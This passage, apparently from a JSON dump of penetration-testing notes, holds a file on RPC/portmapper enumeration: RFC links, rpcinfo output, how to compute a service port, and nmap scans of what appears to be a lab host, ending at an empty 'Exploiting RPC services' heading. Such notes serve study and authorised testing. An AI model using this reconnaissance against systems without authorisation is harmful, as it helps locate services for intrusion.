icmp_req=1 ttl=59 time=18.9 ms\n64 bytes from 46.28.247.113: icmp_req=2 ttl=59 time=139 ms\n\n--- www.google.com ping statistics ---\n2 packets transmitted, 2 received, 0% packet loss, time 5075ms\nrtt min/avg/max/mdev = 18.991/79.281/139.571/60.290 ms\n\n(...)\n\n\n--------------------------------------------------------------------------------\n--------------------------------------------------------------------------------\n\n\n\n\n"
  },
  {
    "path": "snippets/rpc.txt",
    "content": "=== RPC / Portmapper ===\n\nRPC: https://tools.ietf.org/html/rfc1057\nXDR: http://tools.ietf.org/html/rfc1832\nRPC protocol: http://tools.ietf.org/html/rfc5531\n\nIANA RPC programs numbers:\nhttp://www.iana.org/assignments/rpc-program-numbers/rpc-program-numbers.xhtml\n\n\n== RPC basic operations ==\n\n\n1. Calculate RPC port from rpcinfo output\n\n\n$ rpcinfo 192.168.1.1\n   program   version netid     address              service    owner\n   100000       4     tcp6     ::.0.111             portmapper superuser\n   100000       3     tcp6     ::.0.111             portmapper superuser\n   100000       4     udp6     ::.0.111             portmapper superuser\n   100000       3     udp6     ::.0.111             portmapper superuser\n   100000       4     tcp      0.0.0.0.0.111        portmapper superuser\n   100000       3     tcp      0.0.0.0.0.111        portmapper superuser\n   100000       2     tcp      0.0.0.0.0.111        portmapper superuser\n   100000       4     udp      0.0.0.0.0.111        portmapper superuser\n   100000       3     udp      0.0.0.0.0.111        portmapper superuser\n   100000       2     udp      0.0.0.0.0.111        portmapper superuser\n   100000       4     local    /var/run/rpcbind.sock portmapper superuser\n   100000       3     local    /var/run/rpcbind.sock portmapper superuser\n   100024       1     udp      0.0.0.0.161.56       status     102\n   100024       1     tcp      0.0.0.0.129.4        status     102\n   100024       1     udp6     ::.133.8             status     102\n   100024       1     tcp6     ::.159.221           status     102\n\n\nstatus: TCP, 0.0.0.0.129.4\n\n129 * 256 + 4 * 1 = 33024 + 4 = 33028\n\n\n2. Info (?)\n\n$ rpcinfo -T tcp 192.168.1.1 100024\nprogram 100024 version 1 is ready and waiting\n\n\n$ nmap -sV 192.168.1.1 -p-\n\nStarting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-16 20:17 IST\nNmap scan report for 888.darknet.com (192.168.1.1)\nHost is up (0.00050s latency).\nNot shown: 65532 closed ports\nPORT      STATE SERVICE VERSION\n80/tcp    open  http    Apache httpd 2.2.22 ((Debian))\n111/tcp   open  rpcbind 2-4 (RPC #100000)\n33028/tcp open  status  1 (RPC #100024)\t\t\t\t<-- port number calculated correctly\n\n\n$ nmap -sC -p 111 192.168.1.1\n\nStarting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-16 21:58 IST\nNmap scan report for 888.darknet.com (192.168.1.1)\nHost is up (0.00051s latency).\nPORT    STATE SERVICE\n111/tcp open  rpcbind\n| rpcinfo: \n|   program version   port/proto  service\n|   100000  2,3,4        111/tcp  rpcbind\n|   100000  2,3,4        111/udp  rpcbind\n|   100024  1          33028/tcp  status\n|_  100024  1          41272/udp  status\n\n\n\n\n\n== Exploiting RPC services ==\n\n\n\n"
  }
]